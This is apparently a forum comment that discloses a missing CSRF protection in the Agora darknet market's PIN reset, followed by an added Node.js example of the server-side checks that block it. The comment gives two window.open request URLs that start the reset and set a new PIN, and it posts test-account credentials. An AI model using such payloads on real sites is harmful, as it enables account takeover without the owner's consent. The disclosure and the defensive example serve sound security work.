by garrettgrimsley
3973 days ago
It doesn't have to brute force the reset because Agora requires knowledge of neither the current PIN nor the current account password to reset the PIN.

    window.open (url+"/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=", "_blank")

starts the PIN reset process and

    window.open (url+"/resetpin?pin1=1111&pin2=1111&submit=Save", "_blank")

sets the new PIN. For reference, Agora is lauded as one of the most secure darknet markets. You can see the lack of CSRF protection for yourself with the credentials username::password::pin ggHNpinReset::qwertyuiop::1234
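The server-side checks whose absence the comment above describes, as an added example that is not part of the original comment and not Agora's code: the reset refuses GET, requires a session-bound CSRF token, and requires the current password. The request shape, `handleResetPin`, `makeSession`, the in-memory account and the 4-digit PIN rule are assumptions made for illustration.

```javascript
// Added example: in-memory session and handler are constructed, not Agora's code.
const crypto = require("node:crypto");

const SECRET = crypto.randomBytes(32); // server-side key, never sent to the browser

const kdf = (value, salt) =>
  crypto.scryptSync(String(value), salt, 32).toString("hex");

// HMAC over the session id: another origin can trigger a request that carries
// the victim's cookie, but it cannot read or compute this value.
function csrfToken(sessionId) {
  return crypto.createHmac("sha256", SECRET).update(sessionId).digest("hex");
}

function safeEqual(a, b) {
  const x = Buffer.from(String(a));
  const y = Buffer.from(String(b));
  return x.length === y.length && crypto.timingSafeEqual(x, y);
}

// Hypothetical request shape: { method, session: { id, user }, body }.
function handleResetPin(req) {
  if (req.method !== "POST")
    return { status: 405, reason: "state change over GET refused" };
  const { csrf, currentPassword, pin1, pin2 } = req.body || {};
  if (!safeEqual(csrf ?? "", csrfToken(req.session.id)))
    return { status: 403, reason: "CSRF token missing or wrong" };
  const user = req.session.user;
  if (!safeEqual(kdf(currentPassword ?? "", user.salt), user.passwordHash))
    return { status: 403, reason: "current password required" };
  if (!/^\d{4}$/.test(pin1 ?? "") || pin1 !== pin2) // assumed PIN format
    return { status: 400, reason: "PINs must match and be 4 digits" };
  user.pinHash = kdf(pin1, user.salt);
  return { status: 200, reason: "PIN changed" };
}

// Constructed sample account and session.
function makeSession() {
  const salt = crypto.randomBytes(16);
  return {
    id: crypto.randomBytes(16).toString("hex"),
    user: { salt, passwordHash: kdf("constructed-password", salt), pinHash: kdf("1234", salt) },
  };
}
```
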